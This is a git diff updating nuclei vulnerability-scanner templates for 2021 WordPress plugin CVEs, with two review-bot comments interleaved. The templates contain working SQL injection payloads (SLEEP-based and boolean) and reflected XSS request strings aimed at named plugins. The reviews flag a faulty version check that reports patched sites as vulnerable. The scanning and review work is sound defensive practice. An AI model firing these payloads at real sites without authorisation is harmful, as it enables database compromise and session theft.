at end of file 
diff --git a/nuclei-templates/CVE-2021/CVE-2021-24436.yaml b/nuclei-templates/CVE-2021/CVE-2021-24436.yaml index fb0532a5c7..899f45d529 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-24436.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-24436.yaml @@ -6,19 +6,22 @@ info: severity: medium description: | WordPress W3 Total Cache plugin before 2.1.4 is susceptible to cross-site scripting within the extension parameter in the Extensions dashboard, which is output in an attribute without being escaped first. This can allow an attacker to convince an authenticated admin into clicking a link to run malicious JavaScript within the user's web browser, which could lead to full site compromise. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected website, leading to potential data theft, session hijacking, or defacement. remediation: Fixed in version 2.1.4. reference: - https://wpscan.com/vulnerability/3e855e09-056f-45b5-89a9-d644b7d8c9d0 - https://wordpress.org/plugins/w3-total-cache/ - https://wpscan.com/vulnerability/05988ebb-7378-4a3a-9d2d-30f8f58fe9ef - https://nvd.nist.gov/vuln/detail/CVE-2021-24436 + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2021-24436 cwe-id: CWE-79 epss-score: 0.001 - epss-percentile: 0.40981 + epss-percentile: 0.4009 cpe: cpe:2.3:a:boldgrid:w3_total_cache:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -26,7 +29,7 @@ info: vendor: boldgrid product: w3_total_cache framework: wordpress - tags: cve,cve2021,xss,wpscan,wordpress,wp-plugin,wp,w3-total-cache,authenticated + tags: cve2021,cve,xss,wpscan,wordpress,wp-plugin,wp,w3-total-cache,authenticated,boldgrid http: - raw: 
@@ -47,4 +50,4 @@ http: - contains(body_2, '>&action=view') - contains(header_2, "text/html") condition: and -# digest: 490a0046304402204bd06f570fded8c00ff6c7aeb2adbb97a84081d1edca516c5a478dcc470b1b5f0220102d2a67cbc3801f61791b5bee4f20d9a4e24d93c2cbe8137b550d672d0210fa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402201ef6e350c911751d8d5e81ed50cb77824d6c9a7d2c0f9d5ea8e46a0be6ed7eb60220354d8aed65ef0a2257c2b945941807aa31ab5378f1612ae21f59f25020ef5de6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-24442.yaml b/nuclei-templates/CVE-2021/CVE-2021-24442.yaml index 22d58062f1..b27503e1ae 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-24442.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-24442.yaml 
@@ -1,43 +1,49 @@ id: CVE-2021-24442 info: - name: Poll, Survey, Questionnaire and Voting system < 1.5.3 - Unauthenticated Blind SQL Injection - author: akincibor + name: Wordpress Polls Widget < 1.5.3 - SQL Injection + author: ritikchaddha severity: critical - description: The plugin did not sanitise, escape or validate the date_answers[] POST parameter before using it in a SQL statement when sending a Poll result, allowing unauthenticated users to perform SQL Injection attacks. + description: | + The Poll, Survey, Questionnaire and Voting system WordPress plugin before 1.5.3 did not sanitise, escape or validate the date_answers[] POST parameter before using it in a SQL statement when sending a Poll result, allowing unauthenticated users to perform SQL Injection attacks + remediation: Fixed in 1.5.3 reference: - - https://wpscan.com/vulnerability/7376666e-9b2a-4239-b11f-8544435b444a - tags: cve,cve2021,sqli,wp,wordpress,wp-plugin,unauth + - https://wpscan.com/vulnerability/7376666e-9b2a-4239-b11f-8544435b444a/ + - https://nvd.nist.gov/vuln/detail/CVE-2021-24442 + - https://wordpress.org/plugins/polls-widget/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2021-24442 + cwe-id: CWE-89 + epss-score: 0.00212 + epss-percentile: 0.58237 + cpe: cpe:2.3:a:wpdevart:poll\,_survey\,_questionnaire_and_voting_system:*:*:*:*:*:wordpress:*:* + metadata: + verified: true + max-request: 1 + vendor: wpdevart + product: poll\,_survey\,_questionnaire_and_voting_system + framework: wordpress + publicwww-query: "/wp-content/plugins/polls-widget/" + tags: wpscan,cve,cve2021,wp,wp-plugin,wordpress,polls-widget,sqli -requests: - - method: GET - path: - - '{{BaseURL}}/wp-content/plugins/polls-widget/readme.txt' +http: + - raw: + - | + @timeout: 25s + POST /wp-admin/admin-ajax.php?action=pollinsertvalues HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + X-Forwarded-For: {{randstr}} 
- extractors: - - type: regex - name: version - internal: true - group: 1 - regex: - - "(?m)Stable tag: ([0-9.]+)" + question_id=1&poll_answer_securety=8df73ed4ee&date_answers%5B0%5D=SLEEP(5) - - type: regex - group: 1 - regex: - - "(?m)Stable tag: ([0-9.]+)" - - matchers-condition: and matchers: - - type: status - status: - - 200 - - - type: word - words: - - "wpdevart" - part: body - - type: dsl dsl: - - compare_versions(version, '< 1.5.3') \ No newline at end of file + - 'duration>=5' + - 'status_code == 200' + - 'contains_all(body, "{\"answer_name", "vote\":")' + condition: and +# digest: 4a0a0047304502200a19043d7f0d2e1b48cc9b1ae8f2e1b84ac62c18df00ab187a07eb5f98ba5f17022100a48e6060c3f50a27b56f3505e1fa0b6480e1059eda4dcb34d325573dcb4743cf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-24452.yaml b/nuclei-templates/CVE-2021/CVE-2021-24452.yaml index abc601b9b1..6788b79fdb 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-24452.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-24452.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress W3 Total Cache plugin before 2.1.5 is susceptible to cross-site scripting via the extension parameter in the Extensions dashboard, when the setting 'Anonymously track usage to improve product quality' is enabled. The parameter is output in a JavaScript context without proper escaping. This can allow an attacker, who can convince an authenticated admin into clicking a link, to run malicious JavaScript within the user's web browser, which could lead to full site compromise. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected website, leading to potential data theft, session hijacking, or defacement. remediation: Fixed in version 2.1.5. reference: - https://wpscan.com/vulnerability/3e855e09-056f-45b5-89a9-d644b7d8c9d0 
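Review bot: The new `matchers` block at the end of the hunk decides on `duration>=5` from a single request with no baseline, so a slow or throttled host that returns the normal vote JSON satisfies all three conditions and reports a false positive; the `contains_all(body, …)` check narrows the response shape but does not tie the delay to the injected value. A comment such as `# time-based check: no baseline request, confirm against an unmodified request before reporting` would at least make the limitation visible to operators triaging results. The `poll_answer_securety=8df73ed4ee` value is hard-coded and presumably plugin-generated; if it is instance-specific the request may be rejected before the query runs and the check fails silently, which is worth a comment too. Separately, `name` now says `Wordpress Polls Widget` while `description` and `cpe` use `Poll, Survey, Questionnaire and Voting system`, and the rewritten `tags` line drops `unauth` although the description still describes an unauthenticated attack.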
@@ -17,7 +19,7 @@ info: cve-id: CVE-2021-24452 cwe-id: CWE-79 epss-score: 0.001 - epss-percentile: 0.40981 + epss-percentile: 0.4078 cpe: cpe:2.3:a:boldgrid:w3_total_cache:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -25,7 +27,7 @@ info: vendor: boldgrid product: w3_total_cache framework: wordpress - tags: cve,cve2021,xss,wpscan,wordpress,wp-plugin,wp,w3-total-cache,auth + tags: cve2021,cve,xss,wpscan,wordpress,wp-plugin,wp,w3-total-cache,auth,boldgrid http: - raw: @@ -46,4 +48,4 @@ http: - contains(body_2, 'extensions/\'-alert(document.domain)-\'') && contains(body_2, 'w3-total-cache') - contains(header_2, "text/html") condition: and -# digest: 4a0a00473045022100d4803d25dcb8a74dd2b0742b3c8f37fdfc9c280d16e68cd18f79ff6baa53105c02200f24876be246a30206387b4d18152a6c6cf4f68cd1d9d1b293b42474f5e58ff4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502203b2db738722a6a6e1cf4aa896871e333bccd3809069eeb42e599a6549a6a4cc80221008351b510b897929c71b87698098af6cc925f9e1328c8e1f63b39b87de2dd6fd5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/cve-2021-24472.yaml b/nuclei-templates/CVE-2021/CVE-2021-24472.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-24472.yaml rename to nuclei-templates/CVE-2021/CVE-2021-24472.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-24488.yaml b/nuclei-templates/CVE-2021/CVE-2021-24488.yaml deleted file mode 100644 index 227a6f412a..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-24488.yaml +++ /dev/null 
@@ -1,45 +0,0 @@ -id: CVE-2021-24488 - -info: - name: WordPress Plugin Post Grid < 2.1.8 - XSS - author: cckuailong - severity: medium - description: The slider import search feature and tab parameter of the Post Grid WordPress plugin before 2.1.8 settings are not properly sanitised before being output back in the pages, leading to Reflected Cross-Site Scripting issues - reference: - - https://wpscan.com/vulnerability/1fc0aace-ba85-4939-9007-d150960add4a - - https://nvd.nist.gov/vuln/detail/CVE-2021-24488 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2021-24488 - cwe-id: CWE-79 - tags: cve,cve2021,xss,wp,wordpress,wp-plugin,authenticated - -requests: - - raw: - - | - POST /wp-login.php HTTP/1.1 - Host: {{Hostname}} - Origin: {{RootURL}} - Content-Type: application/x-www-form-urlencoded - Cookie: wordpress_test_cookie=WP%20Cookie%20check - - log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 - - - | - GET /wp-admin/edit.php?post_type=post_grid&page=import_layouts&keyword="onmouseover=alert(document.domain)// HTTP/1.1 - Host: {{Hostname}} - - cookie-reuse: true - matchers-condition: and - matchers: - - type: word - part: body - words: - - 'value="\"onmouseover=alert(document.domain)/">' - - 'Post Grid' - condition: and - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2021/cve-2021-24495.yaml b/nuclei-templates/CVE-2021/CVE-2021-24495.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-24495.yaml rename to nuclei-templates/CVE-2021/CVE-2021-24495.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-24507.yaml b/nuclei-templates/CVE-2021/CVE-2021-24507.yaml index dbd5ed6b3b..1e25f53bcc 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-24507.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-24507.yaml 
@@ -1,47 +1,58 @@ id: CVE-2021-24507 + info: - name: Astra Pro Addon < 3.5.2 - Unauthenticated SQL Injection - author: princechaddha,cognnn + name: > + Astra Pro Addon <= 3.5.1 - Unauthenticated SQL Injection + author: topscoder severity: critical - description: The Astra Pro Addon WordPress plugin before 3.5.2 did not properly sanitise or escape some of the POST parameters from the astra_pagination_infinite and astra_shop_pagination_infinite AJAX action (available to both unauthenticated and authenticated user) before using them in SQL statement, leading to an SQL Injection issues + description: > + The Astra Pro Addon WordPress plugin before 3.5.2 did not properly sanitise or escape some of the POST parameters from the astra_pagination_infinite and astra_shop_pagination_infinite AJAX action (available to both unauthenticated and authenticated user) before using them in SQL statement, leading to an SQL Injection issues reference: - - https://wpscan.com/vulnerability/a1a0dc0b-c351-4d46-ac9b-b297ce4d251c - - https://nvd.nist.gov/vuln/detail/CVE-2021-24507 - tags: cve,cve2021,sqli,wordpress,wp-plugin,wp,unauth,astra-pro - -requests: - - raw: - - | - GET / HTTP/1.1 - Host: {{Hostname}} - - - | - POST /wp-admin/admin-ajax.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - action=astra_shop_pagination_infinite&nonce={{nonce}}&query_vars=%7B%22tax_query%22%3A%7B%220%22%3A%7B%22field%22%3A%22term_taxonomy_id%22%2C%22terms%22%3A%5B%229656%29%29+and+%28%287556%3D1223%22%5D%7D%7D%7D&astra_infinite=astra_pagination_ajax&page_no=1 - - - | - POST /wp-admin/admin-ajax.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - action=astra_shop_pagination_infinite&nonce={{nonce}}&query_vars=%7B%22tax_query%22%3A%7B%220%22%3A%7B%22field%22%3A%22term_taxonomy_id%22%2C%22terms%22%3A%5B%229634%29%29+or+%28%286532%3D6532%22%5D%7D%7D%7D&astra_infinite=astra_pagination_ajax&page_no=1 + - 
https://www.wordfence.com/threat-intel/vulnerabilities/id/ec3dd825-bee3-4d09-bc98-aff665988641?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2021-24507 + metadata: + fofa-query: "wp-content/plugins/astra-addon/" + google-query: inurl:"/wp-content/plugins/astra-addon/" + shodan-query: 'vuln:CVE-2021-24507' + tags: cve,wordpress,wp-plugin,astra-addon,critical +http: + - method: GET redirects: true - max-redirects: 2 - req-condition: true - matchers: - - type: dsl - dsl: - - "len(body_2)==0 && len(body_3)>len(body_2)" + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/astra-addon/readme.txt" extractors: - type: regex + name: version part: body - name: nonce + group: 1 internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body group: 1 regex: - - 'infinite_nonce":"(.+?)",' + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "astra-addon" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.5.2') \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-24510.yaml b/nuclei-templates/CVE-2021/CVE-2021-24510.yaml deleted file mode 100644 index a6edca5010..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-24510.yaml +++ /dev/null 
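Review bot: The final dsl matcher `compare_versions(version, '<= 3.5.2')` contradicts both the new `name` (`<= 3.5.1`) and the description ("before 3.5.2"): 3.5.2 is the fixed release, so every patched install is reported vulnerable; it should read `- compare_versions(version, '< 3.5.2')`. The replacement `classification` block has no `cwe-id`, and the new `tags` line drops `cve2021`, `sqli` and `unauth` that the old line carried and that the sibling templates in this commit keep, which breaks tag-based selection for this template. The two `extractors` entries are both named `version` (one `internal: true`, one not); if that is the repository convention for exposing the extracted version in output, a one-line comment saying so would stop the next reader from treating it as a copy-paste error.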
@@ -1,48 +0,0 @@ -id: CVE-2021-24510 - -info: - name: MF Gig Calendar <= 1.1 - Reflected Cross-Site Scripting (XSS) - author: dhiyaneshDK - severity: medium - description: The MF Gig Calendar WordPress plugin through 1.1 does not sanitise or escape the id GET parameter before outputting back in the admin dashboard when editing an Event, leading to a reflected Cross-Site Scripting issue - reference: - - https://wpscan.com/vulnerability/715721b0-13a1-413a-864d-2380f38ecd39 - - https://nvd.nist.gov/vuln/detail/CVE-2021-24510 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 - cve-id: CVE-2021-24510 - cwe-id: CWE-79 - tags: wordpress,cve,cve2021,wp-plugin,authenticated - -requests: - - raw: - - | - POST /wp-login.php HTTP/1.1 - Host: {{Hostname}} - Origin: {{RootURL}} - Content-Type: application/x-www-form-urlencoded - Cookie: wordpress_test_cookie=WP%20Cookie%20check - - log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 - - - | - GET /wp-admin/admin.php?page=mf_gig_calendar&action=edit&id="><" HTTP/1.1 - Host: {{Hostname}} - - cookie-reuse: true - matchers-condition: and - matchers: - - type: word - part: body - words: - - '' - - - type: status - status: - - 200 - - - type: word - part: header - words: - - "text/html" diff --git a/nuclei-templates/CVE-2021/CVE-2021-24554.yaml b/nuclei-templates/CVE-2021/CVE-2021-24554.yaml index 80d356ad9f..eb76bcf50c 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-24554.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-24554.yaml 
@@ -6,6 +6,8 @@ info: severity: high description: | WordPress Paytm Donation plugin through 1.3.2 is susceptible to authenticated SQL injection. The plugin does not sanitize, validate, or escape the id GET parameter before using it in a SQL statement when deleting donations. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an authenticated attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation. remediation: | Update to the latest version of the WordPress Paytm Donation plugin (version > 1.3.2) to mitigate the vulnerability. reference: @@ -13,13 +15,14 @@ info: - https://wordpress.org/plugins/wp-paytm-pay/ - https://codevigilant.com/disclosure/2021/wp-plugin-wp-paytm-pay/ - https://nvd.nist.gov/vuln/detail/CVE-2021-24554 + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.2 cve-id: CVE-2021-24554 cwe-id: CWE-89 - epss-score: 0.17174 - epss-percentile: 0.95563 + epss-score: 0.20268 + epss-percentile: 0.95935 cpe: cpe:2.3:a:freelancetoindia:paytm-pay:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -27,7 +30,7 @@ info: vendor: freelancetoindia product: paytm-pay framework: wordpress - tags: cve2021,sqli,wordpress,wp-plugin,wp,wp-paytm-pay,wpscan,cve + tags: cve,cve2021,sqli,wordpress,wp-plugin,wp,wp-paytm-pay,wpscan,freelancetoindia http: - raw: 
@@ -50,4 +53,4 @@ http: - 'contains(content_type_2, "text/html")' - 'contains(body_2, "paytm-settings_page_wp_paytm_donation")' condition: and -# digest: 4b0a00483046022100cb123a938c7fa83dfac86c0da159fbe444e947a8d1c986438e62b028b7a819d9022100ad49330a947ab757f0a6c87872b2976ab01914680d7457d4d9b94076b20a37cd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206761ba0bbf5025dd6acebce6ae4c00348e7a0c42d2dabe4f89025ddf1f64856802200b643eb17601d207edb76a789e0506dab04b0d1e4d81a8cef2106f21c6234377:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-24627.yaml b/nuclei-templates/CVE-2021/CVE-2021-24627.yaml index 423779681a..23ec47cec5 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-24627.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-24627.yaml @@ -10,13 +10,14 @@ info: - https://wordpress.org/plugins/g-auto-hyperlink/ - https://wpscan.com/vulnerability/c04ea768-150f-41b8-b08c-78d1ae006bbb - https://nvd.nist.gov/vuln/detail/CVE-2021-24627 + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.2 cve-id: CVE-2021-24627 cwe-id: CWE-89 - epss-score: 0.14566 - epss-percentile: 0.95208 + epss-score: 0.14515 + epss-percentile: 0.95609 cpe: cpe:2.3:a:g_auto-hyperlink_project:g_auto-hyperlink:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -25,7 +26,7 @@ info: product: g_auto-hyperlink framework: wordpress publicwww-query: /wp-content/plugins/g-auto-hyperlink/ - tags: cve,cve2021,sqli,wpscan,wordpress,wp-plugin,wp,g-auto-hyperlink,authenticated + tags: cve2021,cve,sqli,wpscan,wordpress,wp-plugin,wp,g-auto-hyperlink,authenticated,g_auto-hyperlink_project variables: num: 999999999 
@@ -59,4 +60,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100c586258619df1c818f9744c079291bf09c6538899174801dc207276382215099022100f246c2c83089282cab1b74a5edd0340011091aeae4139a7aa68003a90e7a81e3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100bdb4a94865f92c4bfb19042de1f21fae7eebca1adb86abff97ff76e2b8a8343002202507f1d079f5aad3bf0c38a5bed17afdc4c7d599611392cc29897c83b6be1425:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-24647.yaml b/nuclei-templates/CVE-2021/CVE-2021-24647.yaml index e66680672a..c5ea07681d 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-24647.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-24647.yaml @@ -6,6 +6,8 @@ info: severity: high description: | The Registration Forms User profile, Content Restriction, Spam Protection, Payment Gateways, Invitation Codes WordPress plugin before 3.1.7.6 has a flaw in the social login implementation, allowing unauthenticated attacker to login as any user on the site by only knowing their user ID or username + impact: | + An attacker can gain unauthorized access to the WordPress site and potentially compromise sensitive information. remediation: Fixed in version 3.7.1.6 reference: - https://nvd.nist.gov/vuln/detail/CVE-2021-24647 @@ -16,8 +18,8 @@ info: cvss-score: 8.1 cve-id: CVE-2021-24647 cwe-id: CWE-287 - epss-score: 0.2135 - epss-percentile: 0.95938 + epss-score: 0.22598 + epss-percentile: 0.96397 cpe: cpe:2.3:a:genetechsolutions:pie_register:*:*:*:*:*:wordpress:*:* metadata: verified: "true" @@ -25,7 +27,7 @@ info: vendor: genetechsolutions product: pie_register framework: wordpress - tags: cve,cve2021,unauth,pie-register,wpscan,wp-plugin,wordpress,wp + tags: cve,cve2021,unauth,pie-register,wpscan,wp-plugin,wordpress,wp,genetechsolutions http: - raw: 
@@ -50,4 +52,4 @@ http: - 'contains(body_1, "pieregister")' - 'contains(body_3, "Username") && contains(body_3, "email-description")' condition: and -# digest: 490a0046304402206da7c1db19cc38f0a75883ff2a405f97d55c0241e40fde46e033149ad35d638202203087903b931a12cdda39b73fdf99f8768b7c00d82a9d2b7d305bcc8634127ed7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220204302541a5adc4eb84fc50fb71121e7140fda5e325560f2bc6af782c3aca218022100ab9e70ee88a95d91743d26f6f03d095cacd2446df954554ebd5977cd1815c210:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-24666.yaml b/nuclei-templates/CVE-2021/CVE-2021-24666.yaml index 69d16e2f8f..542c26187d 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-24666.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-24666.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | WordPress Podlove Podcast Publisher plugin before 3.5.6 is susceptible to SQL injection. The Social & Donations module, not activated by default, adds the REST route /services/contributor/(?P[\d]+) and takes id and category parameters as arguments. Both parameters can be exploited, thereby potentially enabling an attacker to obtain sensitive information, modify data, and/or execute unauthorized administrative operations. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation, or data leakage. remediation: Fixed in version 3.5.6. reference: - https://wpscan.com/vulnerability/fb4d7988-60ff-4862-96a1-80b1866336fe @@ -17,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-24666 cwe-id: CWE-89 - epss-score: 0.23542 - epss-percentile: 0.96096 + epss-score: 0.28174 + epss-percentile: 0.96727 cpe: cpe:2.3:a:podlove:podlove_podcast_publisher:*:*:*:*:*:wordpress:*:* metadata: verified: true 
@@ -26,7 +28,7 @@ info: vendor: podlove product: podlove_podcast_publisher framework: wordpress - tags: cve2021,sqli,wordpress,wp-plugin,wp,podlove-podcasting-plugin-for-wordpress,wpscan,cve + tags: cve2021,cve,sqli,wordpress,wp-plugin,wp,podlove-podcasting-plugin-for-wordpress,wpscan,podlove http: - method: GET @@ -50,4 +52,4 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221008ae3ddbff5f8e43b5c547e35a3c5755f0a9b14706ee445a41dac7d10c87eb9b5022100853e1aad8b4fa8f3dcf3a23bdb86a896bda4eea99afb79f64f937b0289e93f7d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022026044c3717272e2e8420ed333438950d1278ecd387d98be83b17a4e221c88061022100f29de45026c0ac79f866c24c10ac02390cb7b01c5b01472839be278f0b677522:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-24731.yaml b/nuclei-templates/CVE-2021/CVE-2021-24731.yaml index 9fe966162c..34085ea7cf 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-24731.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-24731.yaml 
@@ -1,43 +1,50 @@ id: CVE-2021-24731 info: - name: Pie Register < 3.7.1.6 - Unauthenticated SQL Injection - author: akincibor + name: Pie Register < 3.7.1.6 - SQL Injection + author: theamanrawat severity: critical - description: The plugin does not properly escape user data before using it in a SQL statement in the wp-json/pie/v1/login REST API endpoint, leading to an SQL injection. + description: | + The Registration Forms User profile, Content Restriction, Spam Protection, Payment Gateways, Invitation Codes WordPress plugin before 3.7.1.6 does not properly escape user data before using it in a SQL statement in the wp-json/pie/v1/login REST API endpoint, leading to an SQL injection. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. + remediation: Fixed in version 3.7.1.6 reference: - https://wpscan.com/vulnerability/6bed00e4-b363-43b8-a392-d068d342151a - tags: cve,cve2021,sqli,wp,wordpress,wp-plugin,unauth + - https://wordpress.org/plugins/pie-register/ + - https://nvd.nist.gov/vuln/detail/CVE-2021-24731 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2021-24731 + cwe-id: CWE-89 + epss-score: 0.14786 + epss-percentile: 0.95651 + cpe: cpe:2.3:a:genetechsolutions:pie_register:*:*:*:*:*:wordpress:*:* + metadata: + verified: "true" + max-request: 1 + vendor: genetechsolutions + product: pie_register + framework: wordpress + tags: cve,cve2021,sqli,wpscan,wordpress,wp-plugin,wp,pie-register,unauth,genetechsolutions -requests: - - method: GET - path: - - '{{BaseURL}}/wp-content/plugins/pie-register/readme.txt' +http: + - raw: + - | + @timeout: 10s + POST /wp-json/pie/v1/login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 - extractors: - - type: regex - name: version - internal: true - group: 1 - regex: - - 
"(?m)Stable tag: ([0-9.]+)" + user_login='+AND+(SELECT+8149+FROM+(SELECT(SLEEP(3)))NuqO)+AND+'YvuB'='YvuB&login_pass=a - - type: regex - group: 1 - regex: - - "(?m)Stable tag: ([0-9.]+)" - - matchers-condition: and matchers: - - type: status - status: - - 200 - - - type: word - words: - - "Registration Forms" - part: body - - type: dsl dsl: - - compare_versions(version, '< 3.7.1.6') \ No newline at end of file + - 'duration>=6' + - 'status_code == 200' + - 'contains(content_type, "application/json")' + - 'contains(body, "User credentials are invalid.")' + condition: and +# digest: 4b0a00483046022100fce3161626802d300b9a7d01b3d0b39df2f76c16556c4cd0f1f0f331408796bf022100f4a95c3a1fee3e3a75c2105e41b3554e20ce5802440a244a4f7cab3280f3178f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/cve-2021-24750.yaml b/nuclei-templates/CVE-2021/CVE-2021-24750.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-24750.yaml rename to nuclei-templates/CVE-2021/CVE-2021-24750.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-24791.yaml b/nuclei-templates/CVE-2021/CVE-2021-24791.yaml index f2042479b4..f883fd42cc 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-24791.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-24791.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2021-24791 cwe-id: CWE-89 epss-score: 0.10363 - epss-percentile: 0.944 + epss-percentile: 0.94849 cpe: cpe:2.3:a:draftpress:header_footer_code_manager:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -26,7 +26,7 @@ info: product: header_footer_code_manager framework: wordpress google-query: inurl:"/wp-content/plugins/wp-custom-pages/" - tags: wpscan,cve,cve2021,sqli,wp,wordpress,wp-plugin,authenticated,header-footer-code-manager + tags: cve2021,cve,wpscan,sqli,wp,wordpress,wp-plugin,authenticated,header-footer-code-manager,draftpress http: - raw: 
@@ -49,4 +49,4 @@ http: - 'contains(content_type_2, "text/html")' - 'contains(body_2,"Add New Snippet")' condition: and -# digest: 4a0a00473045022100d48f9ed571eaf5aa781a765e3288810a026de6ad427a26444f4852fcc4391e1802204b6030f2e8c41b532bc75cd2ac83add101e801eb13c38f0e1b0c005f59c205d5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210095714900b273532b79c9b68b4b7daad27ed4f8b54d5e90deef7d4e7820dc084702206369f1b610cf19a0d46bf27a00db0246bcaf269e93d481a69a1d44812064a241:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-24827.yaml b/nuclei-templates/CVE-2021/CVE-2021-24827.yaml index e2582bf98a..b5fcefc9e4 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-24827.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-24827.yaml @@ -6,6 +6,10 @@ info: severity: critical description: | WordPress Asgaros Forum plugin before 1.15.13 is susceptible to SQL injection. The plugin does not validate and escape user input when subscribing to a topic before using it in a SQL statement. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability allows an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation. + remediation: | + Upgrade to the latest version of Asgaros Forum (1.15.13 or higher) to 